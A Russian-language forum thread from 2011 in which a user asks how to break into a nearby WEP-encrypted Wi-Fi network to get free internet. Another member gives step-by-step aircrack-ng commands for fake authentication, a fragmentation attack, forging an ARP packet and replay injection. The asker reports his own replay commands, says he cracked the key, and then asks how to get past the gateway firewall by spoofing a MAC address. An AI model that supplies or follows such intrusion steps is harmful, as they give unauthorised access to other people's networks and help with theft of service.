как разговорить точку

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by sergiy2, 15 Mar 2011.

  1. sergiy2

    sergiy2 New Member

    Joined:
    14 Mar 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте! Прошу помощи у гуру! Может быть избитая тема, но тем не менее проблема.Нахожусь в радиусе действия сети. При попытке соединения в XP при вводе произвольного ключа выдает что соединение ограничено или отсутствует, при этом присваивается IP 169.254.19.61 с маской 255.255.0.0. Из под ВТ4 airodump собирает #Data-пакеты очень медленно, за месяц собрал 4500. То же и с CommView. Пробовал airoplay, но он ускоряет обмен только beacon-пакетами. Подскажите как ускорить. Может airoplay не так использую? Запускал: -e 1 -a BSSID -c BSSID --deaut 20 mon0. Распознаются две АР, известны BSSID,ESSID И MAC адреса.Шифрование WEP.У меня встроенная Realtek RTL8187B USB2.0 и имеется внешний TP-Link TL-WN821N. Цель-поиметь инет через сеть. И еще прошу мануал по ARP инжекции и как пртестировать адаптеры на предмет использоания этой атаки. Заранее благодарен.
     
  2. reddevil001

    reddevil001 Elder - Старейшина

    Joined:
    23 Oct 2010
    Messages:
    117
    Likes Received:
    17
    Reputations:
    19
    Попробуй этот способ:

    Запуск аутентификации на точку:
    aireplay-ng -1 1 -b "bSSID" mon0

    Далее запускаем команду:
    aireplay-ng -5 -b "bSSID" mon0

    ждем 1.5 килобайтный пакет
    20:23:30 Trying to get 1500 bytes of a keystream
    20:23:30 Got RELAYED packet!!
    Saving keystream in fragment-0437-193230.xor

    Занимает рандомное кол-во времени.

    Создаем пакет для дальнейшего вешания в сеть:
    packetforge-ng -0 -a "bssid" -h "мак клиента" -k 255.255.255.255 -l 255.255.255.255 -y fragment-0437-193230.xor -w arp

    Кидаем пакет в сеть:
    aireplay-ng -2 -r arp mon0

    Попробуй, должно получится.

    P.S. Проверка инъекций:

    aireplay-ng -9 -e "essid" mon0
     
    #2 reddevil001, 15 Mar 2011
    Last edited: 16 Mar 2011
    1 person likes this.
  3. sergiy2

    sergiy2 New Member

    Joined:
    14 Mar 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    reddevil001, большое спасибо за совет, обязательно попробую и напишу что получилось. Удалось собрать 47000 ivs путем :
    aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b [bssid] -h [bssid второй АР] mon0

    и многократными запусками:

    aireplai-ng -1 0 -a[bssid] -h [bssid второй точки] mon0

    Но на 47000 airodump перестал сохранять пакеты , судя по сообщениям исчерпалось пространство на виртуальном диске-ВТ запускал с DVD. PWT атака на aircrack ничего не дала--видимо мало пакетов. И непонятно, сохраняет ли airodump ARP пакеты. Вроде должен, я --ivs не ставил. Можно ли ВТ4 с DVD на жесткий установить? Linux нет возможности поставить, имеется только диск с ВТ4. Адаптер инжекцию поддерживает.
     
  4. reddevil001

    reddevil001 Elder - Старейшина

    Joined:
    23 Oct 2010
    Messages:
    117
    Likes Received:
    17
    Reputations:
    19
    Можно, если диск пустой(т.е. без Виндусов и т.д). Запусти install.sh с рабочего стола и следуй инструкциям установки(Подробно )

    Если винда все же установлена, тогда придется разделять жесткий диск на разделы. Сделать это можно с помощью "partition magic", если не ошибаюсь, он есть в backtracke.
     
  5. sergiy2

    sergiy2 New Member

    Joined:
    14 Mar 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0

    Ответ на 1 команду:

    09:57:30 Please specify at least a Bssid (-a) ar an Essid (-e)

    На 2 команду:

    Считывает пакет, предлагает использовать, после"y" записывает в файл replay_src-.... .cap
    и потом:
    Data packet found!
    Sending fragmented packet
    Got a deauthenification packet!
    Not enough asks, repeating...
    и далее все повторяется

    или я не дождался 1,5 кб пакета, или что-то не так, т.к. .xor файл не создается


    за совет по установке большое спасибо, сейчас попробую, а то вчера собрал 370000 пакетов и ноут отключился изза питания, все похерилось. надеюсь, если установить на жесткий .cap файлы будут сохраняться?
     
  6. sergiy2

    sergiy2 New Member

    Joined:
    14 Mar 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Взломал ключ, подключился к сети, но к интернету подключиться не могу. Мне автоматически назначается IP и шлюз и IP DNS сервера, но браузер не подключается. Исследовал сеть LanSpy, почему-то компьютеры с МАС которые видит CommView и кот. использовались для взлома в сети отсутствуют. Другие сканеры тоже их не видят. Еще выяснилось, что шлюз с сет.экраном. Пробовал менять свой МАС на МАС из сети, ничего не дало. Что делать? Инет должен быть в сети